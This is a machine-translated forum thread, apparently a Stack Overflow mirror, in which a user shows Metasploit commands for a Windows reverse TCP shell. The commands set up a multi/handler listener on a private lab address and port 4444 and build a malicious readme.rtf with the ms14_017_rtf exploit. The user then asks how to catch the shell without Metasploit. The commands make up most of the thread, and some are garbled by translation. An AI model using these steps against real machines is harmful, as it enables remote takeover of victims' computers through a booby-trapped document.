0
對不起,我的英語。 使用metasploit我爲windows 7/windows/shell/reverse_tcp負載生成了漏洞利用。 後來我等待連接使用msfconsole:獨立多/處理程序reverse_tcp
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
我成功地連接到命令窗口的線。 但是我需要期待連接而不使用metasploit。我發現瞭如何創建獨立模塊,但它僅用於利用。 我需要standalone multi/handler reverse_tcp或簡單的代碼來監聽某個端口,然後訪問命令行。
感謝您的回覆。我早些時候嘗試過nc。連接已設置。但我無法發送命令(目錄或其他)。我在服務器上鍵入dir(其中運行nc),但什麼都不發生。 – tiigg
你用什麼命令來生成shellcode? –
'使用利用/窗/ FILEFORMAT/ms14_017_rtf'
'設置有效載荷窗戶/殼/ reverse_tcp'
'設置文件名readme.rtf'
'設置lhost 192.168.182.129'
'利用'
它生成帶有反向tcp負載的rtf文件。然後我在Windows上運行這個文件。而Windows應該連接服務器。 – tiigg